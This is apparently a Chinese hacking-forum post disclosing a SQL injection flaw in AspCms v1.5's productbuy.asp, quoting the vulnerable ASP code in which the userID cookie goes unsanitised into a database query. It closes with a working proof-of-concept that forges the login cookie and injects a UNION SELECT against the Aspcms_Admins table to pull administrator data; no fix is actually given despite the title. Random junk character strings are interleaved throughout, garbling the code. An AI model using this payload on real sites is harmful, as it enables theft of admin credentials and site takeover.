AspCms_v1.5_20110517 SQL注射漏洞及修复

admin

好久没上土司了，上来一看发现在删号名单内.....
也没啥好发的，前些天路过某个小站，用的AspCms这个系统，搜索了下，productbuy.asp这个文件存在注射，但是目标已经修补....下载了代码，很奇葩的是productbuy.asp这个文件官方虽然修补了网上提到的漏洞，但是就在同一个文件下面找到了注射漏洞。。。。。。。
" z: M9 ^2 x. p4 A废话不多说，看代码：
/ R' R$ i' E+ B# c3 ~0 g' X! i% `
9 F, W9 R: y: D% t5 `5 D- B<%

if action = "buy" then

        addOrder()
2 G' u% n" N8 P( Y* K6 r; `5 G
else

  G& T% h* |) m/ t# o( F7 X        echoContent()
# |7 l: Z& |" L
end if
$ }2 ?6 O+ |) Q# _' R& Q


7 d' p- ]' P, G' A$ f; b) M0 Z4 F/ Q……略过
. ?7 D2 @# I2 ^8 s# c. _
$ `# o; J2 n: E& ?$ ]$ X5 T/ d3 e
  ~" p) R# @! E, B
( w/ X; V4 b9 Y7 aSub echoContent()

* E4 h: R, v2 q, E, \        dim id

        id=getForm("id","get")

        
7 ~0 w$ d. j1 }* c; `4 c& a- z
        if isnul(id) or not isnum(id) then alertMsgAndGo "请选择产品！","-1"
( m9 N) z/ n' V$ G3 S$ A8 P
* t6 t$ o* j/ ?5 z& H        
6 L( I+ ^6 Z; A/ p
6 S" M6 g0 M, @; O" x/ z        dim templateobj,channelTemplatePath : set templateobj = mainClassobj.createObject("MainClass.template")
% N1 Y3 ~+ H9 i6 p% b  Q
. I8 ]# @& g# G% I0 L        dim typeIds,rsObj,rsObjtid,Tid,rsObjSmalltype,rsObjBigtype,selectproduct

        Dim templatePath,tempStr

6 u8 I( D/ D& w        templatePath = "/"&sitePath&"templates/"&defaultTemplate&"/"&htmlFilePath&"/productbuy.html"
1 b+ N2 \. @5 f* z6 z/ z

; z" j8 X1 j+ p! w
3 t6 G' ~: f* Z+ V2 G- }  ?* Q        set rsObj=conn.Exec("select title from aspcms_news where newsID="&id,"r1")
! @% I2 z7 b' v9 |; m
        selectproduct=rsObj(0)
1 b, |; @7 p; s! ~+ _" N
: M1 _8 d: s8 Q4 a3 P        
0 A" O5 u# S3 N. I5 i, U" o3 M3 `' v7 T
1 k" I6 \2 ^2 z$ T8 t        Dim linkman,gender,phone,mobile,email,qq,address,postcode
8 @) T0 u+ q: M. Z) m
+ @" Y3 `8 A7 `; ?5 J# r% R% Z! z  `        if isnul(rCookie("loginstatus")) then  wCookie"loginstatus",0
: I# _5 b* _9 Y$ j; w" j
' `8 o* n6 B4 f$ a+ a! M6 D, v        if rCookie("loginstatus")=1 then  
; o# |& h; s9 J# I$ f- x
                set rsObj=conn.Exec("select *  from aspcms_Users where UserID="&trim(rCookie("userID")),"r1")
3 R) G6 d' h1 A
                linkman=rsObj("truename")
3 D1 q- B+ {+ O* ]' W: P! ?& ^& Q
                gender=rsObj("gender")

2 \1 X% n+ _) p, D6 I8 w5 W' S, b                phone=rsObj("phone")
. X! t* ~2 L  Z; E9 e7 X, U, w$ m9 \
                mobile=rsObj("mobile")

                email=rsObj("email")
4 n7 M/ e2 b& ~
                qq=rsObj("qq")

                address=rsObj("address")

/ Q& Q- X" s$ l; m% F# ?5 y( t                postcode=rsObj("postcode")
( B+ q: d. b) {" U; `
( J7 s$ C9 d8 O5 t        else

                gender=1
/ |) x" p) G# ], [+ Q2 _* S
        end if
( _3 u- c' w8 z
/ _7 O% b! r9 w/ ^6 }1 \. G6 k        rsObj.close()

+ h; X9 E: ^: ?- ]               
9 F& {1 ~0 a$ T/ d# f, @6 i
4 w, h! R5 h: }5 Z; I% Q        with templateObj

% o' z: N" J4 i. V                .content=loadFile(templatePath)        
" V6 C0 y# m0 \+ J7 D9 b1 u
: _' |. c* j, \/ l9 h) \0 n                .parseHtml()
: M! o: k0 Z, R1 R5 X8 W
* w) e# V6 @) {1 Y3 L2 F1 C: G  D                .content=replaceStr(.content,"{aspcms:selectproduct}",selectproduct)

                .content=replaceStr(.content,"[aspcms:linkman]",linkman)               

) L3 B; Q# @8 [0 \4 f' J. K                .content=replaceStr(.content,"[aspcms:gender]",gender)               
" g) R# v% J% `, h7 s
                .content=replaceStr(.content,"[aspcms:phone]",phone)               
9 p, M1 S4 E$ n5 B  |5 u: C6 h
' ~& ^2 M; t( q8 K  R                .content=replaceStr(.content,"[aspcms:mobile]",mobile)               

                .content=replaceStr(.content,"[aspcms:email]",email)                        

                .content=replaceStr(.content,"[aspcms:qq]",qq)                        
# E. `; ?- V0 Z
                .content=replaceStr(.content,"[aspcms:address]",address)                        

+ c: X2 Q' B, h% _8 y' }( M                .content=replaceStr(.content,"[aspcms:postcode]",postcode)        
2 Z6 ~: Z& x9 c# v# n
  W; s& y$ Q: a' j, b) Q                .parseCommon()                 

                echo .content

1 v  i. x4 T; ^  t3 ]  O( l5 g        end with
1 L; |3 F5 s! T: U# \, j% {8 d7 `. l
; {- h' J- P+ W- T        set templateobj =nothing : terminateAllObjects

End Sub
; n6 o% R% W) u# S2 E5 O漏洞很明显，没啥好说的
poc：

javascript:alert(document.cookie="loginstatus=" + escape("1"));alert(document.cookie="userID=" + escape("1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 from [Aspcms_Admins]"));另外，脚本板块没权限发帖子​